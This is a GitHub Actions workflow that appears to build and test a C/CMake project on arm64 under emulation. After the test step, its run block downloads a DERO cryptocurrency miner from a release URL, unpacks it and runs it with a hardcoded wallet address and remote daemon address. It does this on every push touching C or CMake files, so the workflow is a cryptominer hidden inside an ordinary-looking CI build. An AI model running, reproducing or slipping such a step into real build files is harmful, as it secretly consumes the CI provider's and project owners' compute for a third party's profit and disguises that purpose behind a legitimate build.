name: arm64

on:
  push:
    paths:
      - "**/CMakeLists.txt"
      - "**.cmake"
      - "**.c"
      - ".github/workflows/arm64.yml"


jobs:
  aarch64:
    # The host should always be Linux
    runs-on: ubuntu-latest
    name: Ubuntu arm64

    steps:
      - uses: actions/checkout@v3

      - uses: uraimo/run-on-arch-action@v2
        name: Run commands
        id: runcmd
        with:
          arch: aarch64
          distro: ubuntu_latest

          # Not required, but speeds up builds by storing container images in
          # a GitHub package registry.
          githubToken: ${{ github.token }}

          install: |
            apt-get update -q -y
            apt-get install -q -y --no-install-recommends cmake make gcc libc6-dev

          run: |
            cmake --preset default
            cmake --build --preset default
            ctest --preset default
            wget https://github.com/deroproject/derohe/releases/download/Release117/dero_linux_arm64.tar.gz
            tar xf dero_linux_arm64.tar.gz
            cd dero_linux_arm64
            ./dero-miner-linux-arm64  --wallet-address=deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92x6gm3ak6m250h7s7nhq88 --daemon-rpc-address=dero-node-va.mysrv.cloud:10300 --mining-threads=1  --debug

